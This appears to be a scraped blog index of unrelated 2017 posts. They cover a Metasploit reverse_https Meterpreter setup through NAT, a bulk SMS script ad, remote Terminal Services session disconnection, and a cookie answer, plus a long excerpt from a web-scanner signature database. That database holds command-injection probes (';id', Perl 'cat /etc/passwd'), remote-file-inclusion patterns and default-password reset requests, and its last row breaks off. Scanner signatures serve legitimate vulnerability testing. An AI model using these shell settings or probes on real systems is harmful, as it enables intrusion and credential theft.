Thursday, May 25, 2017

Metasploit Get Shell Through NAT

You can use meterpreter/reverse_https and set LHOST to your public ip. Make sure you forward port 443 to the machine hosting metasploit.
set payload windows/meterpreter/reverse_https
set LPORT 443
set LHOST YOUR PUBLIC IP
"Since our attacker host is behind NAT, we have to use the public IP address of the router/firewall as LHOST. When the exploit is executed, this IP will be embedded in the shellcode and when the initial Meterpreter shellcode runs on the target, it will connect back to this IP address. The port forwarding on our router/firewall will then forward traffic to our LAN IP of the attacker host. For this reason, we need to set LHOST to 1.1.1.1 (the public IP of your attacker router/firewall)
Using a public IP as LHOST also means that Metasploit will attempt to bind itself to that IP when setting up the Meterpreter handler. Since this IP belongs to the router/firewall and not to the Metasploit instance, this will obviously fail. The good thing is that Metasploit will automatically fall back to 0.0.0.0 and basically serve the Meterpreter handler on all local IPs on the attacker host, while remembering that LHOST was set to our public IP address. This is exactly what we need."
at No comments:

MASSIVE SMS MARKETING

 398 Downloads (This Week)
 Last Update: 
DownloadSMS script
Browse All Files
Smser

Description

Simple and easy for modification, PHP script for SMS text messages sending API. SMS Gateway (Australia, United Kingdom, United States, Brazil, Türkiye, España, Suomi, México, Italia, India, France, Malaysia, Argentina, Colombia, Canada, Indonesia, Deutschland, Nigeria, Kenya, Ethiopia, Egypt, Philippines and Worldwide coverage!) through HTTP with your Virtual mobile number and delivery reports. You just have to type your account information ( https://www.proovl.com  ) and upload file on server. 

https://www.youtube.com/watch?v=dfPh7Qs_twk 
https://www.youtube.com/channel/UCYuMRNb_SRZ4FMsZjnHRZUA 


https://www.proovl.com/websms 

Numbers for SMS => https://www.proovl.com 
One-day SMS numbers => https://www.groovl.com 

receive sms online script
https://sourceforge.net/projects/sms-number/
Bulk SMS script
https://sourceforge.net/projects/bulk-sms-script/
http://aaronsmith-tech.blogspot.com/2017/04/send-text-messages-from-website-using.html 
at No comments:

Howto: Remotely disconnect a Terminal Services Session

I’ve written about another method for remotely disconnecting a terminal server session can be found here.
Windows server 2000/2003 allows two remote terminal services connections for administrative purposes.  Every once in a while I’ll get the “You exceeded the allowed connection count” message when trying to connect to a server via RDP, because previous sessions were not disconnected correctly.
You can use either of the following methods to remotely disconnect Terminal Server sessions.
Method 1
You can normally run the Terminal Services Manager program on another server, or even from a Windows XP workstation, to disconnect Terminal Services connections by clicking Start – Run and then typing
%SystemRoot%\system32\tsadmin.exe
This will launch the local copy of Terminal Services Manager.  Next right click on All Listed Servers and select Connect to Computer.  Type in the name or IP address of the server you wish to manage. 
 All Listed Servers in Terminal Services Manager
Select your server from the left pane, then select the Sessions tab from the right pane.  Right click on the session you wish to disconnect and select Disconnect.
You should now be able to login to the target server via Terminal Services.
Method 2
Authenticate to the server you wish to manage.  You can easily accomplish this by mapping a network drive to a share on the target server.  Start a command prompt and type
qwinsta /server:yourservername
where yourservername is the name or IP address of the server you wish to manage.
In my case I ran qwinsta /server:10.0.0.2
You can see the Administrator account is logged into session 0 and the admin account is logged into session 1.  To disconnect the admin session with ID=1 I’ll run the following from a command prompt:
rwinsta ID /server:yourservername
where ID is the process ID of the sesstion you wish to terminate, and yourservername is the name or IP address of the server you wish to manage.
In my case I ran rwinsta 1 /server:10.0.0.2
I again ran qwinsta /server:10.0.0.2 which verified session 1 had been disconnected.  I confirmed that I was once again able to login to Terminal Services.
Thanks to Ingo for some of the information, which I found via Andy
at No comments:

Wednesday, May 24, 2017

Jackass bad grandpa funeral scene!

at No comments:

Red 2 You Dead Yet Moses !!!

at No comments:

look at the trap: But you can set a cookie in a servlet/script and then read/modify the cookie in another servlet/script on the same host. You can even read or modify a cookie set on a server running on one port on the same hostname/domain from a server running on another port at the same hostname/domain - so you can have Tomcat running on two different ports on the same server and exchange cookies between the two.

Note that you're calling setDomain incorrectly in the first example - this field of the cookie takes a domain name and not a full URL. So the call should look like this:
cookie.setDomain("localhost");
As the other answer notes, some browsers ignore cookies for localhost, so you may want to not set this field of the cookie at all - this has the effect of setting a cookie that will only be returned to the same host that set it (which most of the time is what you want).



at No comments:

Passing a path to a non-existent file to the shtml.exe or shtml.dll (link: https://github.com/andresriancho/w3af-kali/blob/master/w3af/plugins/tests/crawl/pykto/scan_database.db)



"001142","11140","3","/phorum/admin/stats.php","GET","Phorum Stats","","","","","PHP based forum script Phorum allows a user to retrieve the top ten active users, including email addresses. Delete the script or pass protect it.","",""
"001143","2809","3","/php-coolfile/action.php?action=edit&file=config.php","GET","pass_1","","","","","PHP-Coolfile 1.4 may allow any user to read the config.php file.","",""
"001144","3233","3","/phpBB/phpinfo.php","GET","PHP Version","","","","","phpBBmod contains an enhanced version of the phpinfo.php script. This should be removed as it contains detailed system information.","",""
"001145","3233","3","/phpinfo.php","GET","PHP Version","","","","","Contains PHP configuration information","",""
"001146","3233","3","/phpinfo.php3","GET","PHP Version","","","","","Contains PHP configuration information","",""
"001147","0","3","/pmlite.php","GET","200","","","","","A Xoops CMS script was found. Version RC3 and below allows all users to view all messages (untested). See http://www.phpsecure.org/?zone=pComment&d=101 for details."," ",""
"001148","0","3","/session/admnlogin","GET","200","Error Occurred","","","","SessionServlet Output, has session cookie info.","",""
"001149","6560","3","/settings/site.ini","GET","DatabaseSettings","","","","","eZ publish v3 and prior allow site setup code to be viewed remotely.","",""
"001150","613","3","/SiteScope/htdocs/SiteScope.html","GET","200","","","","","The SiteScope install may allow remote users to get sensitive information about the hosts being monitored.","",""
"001151","0","3","/soapdocs/ReleaseNotes.html","GET","Oracle SOAP","","","","","Default Oracle SOAP documentation found.","",""
"001152","0","3","/ssdefs/siteseed.dtd","GET","imagesDir=\"","","","","","Siteseed pre 1.4.2 has 'major' security problems, and this dtd file reveals the web root.","",""
"001153","0","35","/servlet/allaire.jrun.ssi.SSIFilter","GET","200","Error Occurred","","","","Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call, see MPSB01-12 http://www.macromedia.com/devnet/security/security_zone/mpsb01-12.html.","",""
"001154","2881","3a","/pp.php?action=login","GET","200","","","","","Pieterpost 0.10.6 allows anyone to access the 'virtual' account which can be used to relay/send e-mail.","",""
"001155","0","6","/isapi/count.pl?","GET","200","","","","","AN HTTPd default script may allow writing over arbitrary files with a new content of '1', which could allow a trivial DoS. Append /../../../../../ctr.dll to replace this file's contents, for example.","",""
"001156","0","7","/krysalis/","GET","200","","","","","Krysalis pre 1.0.3 may allow remote users to read arbitrary files outside docroot","",""
"001157","0","8","/logjam/showhits.php","GET","200","","","","","Logjam may possibly allow remote command execution via showhits.php page.","",""
"001158","0","8","/manual.php","GET","200","","","","","Does not filter input before passing to shell command. Try 'ls -l' as the man page entry.","",""
"001159","16748","8","/mods/apage/apage.cgi?f=file.htm.|id|","GET","uid=0","","","","","WebAPP Apage.CGI remote command execution. BID-13637","",""
"001160","0","8","/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","GET","uid=","","","","","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.","",""
"001161","0","8","/nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","GET","uid=","","","","","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.","",""
"001162","0","8","/perl/-e%20%22system('cat%20/etc/passwd');\%22","GET","root:","","","","","The installed Perl interpreter allows any command to be executed remotely.","",""
"001163","0","8","/phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","GET","uid=","","","","","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.","",""
"001164","0","8","/phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","GET","uid=","","","","","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.","",""
"001165","0","8","/Program%20Files/","GET","WindowsUpdate","","","","","This check (B) uses the blue test (A) for possible exploit. see http://www.badblue.com/down.htm.","",""
"001166","14329","8","/smssend.php","GET","200","","","","","PhpSmssend may allow system calls if a ' is passed to it. http://zekiller.skytech.org/smssend.php","",""
"001167","0","8a","/pls/simpledad/admin_/dadentries.htm","GET","Add Database Access","","","","","Oracle admin script allows modification of database information.","",""
"001168","0","a","/Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000","POST","Login as Admin successful","","","","","Meridian Integrated Recorded Announcer default account admin/admin000 enabled","",""
"001169","113","a","/ncl_items.html","GET","200","","","","","This may allow attackers to reconfigure your Tektronix printer.","",""
"001170","551","a","/ncl_items.shtml?SUBJECT=1","GET","200","","","","","This may allow attackers to reconfigure your Tektronix printer.","",""
"001171","0","a","/photo/manage.cgi","GET","200","","","","","My Photo Gallery management interface. May allow full access to photo galleries and more.","",""
"001172","0","a","/photodata/manage.cgi","GET","200","","","","","My Photo Gallery management interface. May allow full access to photo galleries and more.","",""
"001174","5374","a","/pub/english.cgi?op=rmail","GET","200","","","","","BSCW self-registration may be enabled. This could allow untrusted users semi-trusted access to the software. 3.x version (and probably some 4.x) allow arbitrary commands to be executed remotely.","",""
"001175","0","a","/pvote/ch_info.php?newpass=password&confirm=password%20","GET","200","","","","","PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password.","",""
"001176","240","a","/scripts/wsisa.dll/WService=anything?WSMadmin","GET","200","","","","","Allows Webspeed to be remotely administered. Edit unbroker.properties and set AllowMsngrCmds to 0.","",""
"001177","3092","a","/SetSecurity.shm","GET","200","","","","","Cisco System's My Access for Wireless. This resource should be password protected.","",""
"001178","3126","a","/submit?setoption=q&option=allowed_ips&value=255.255.255.255","GET","200","","","","","MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.","",""
"001179","2225","a","/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin","GET","200","","","","","paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.","",""
"001180","817","ab","/servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&","GET","server\.javawebserver\.serviceAdmin","","","","","The Sun JavaServer has the default admin/admin account enabled. Change the password or disable the server if it is not needed.","",""
"001181","3092","b","/shopadmin.asp","GET","200","","","","","VP-ASP shopping cart admin may be available via the web. Default ID/PW are vpasp/vpasp and admin/admin.","",""
"001182","3848","c","/modsecurity.php?inc_prefix=@RFIURL","GET","PHP Version","","","","","This phpWebSite script may allow inclusion of remote scripts by adding ?inc_prefix=http://YOURHOST/","",""
"001183","4268","c","/phpBB2/includes/db.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Some versions of db.php from phpBB2 allow remote file inclusions. Verify the current version is running.","",""
"001184","6662","4","/","GET","
at No comments:
Subscribe to: Posts (Atom)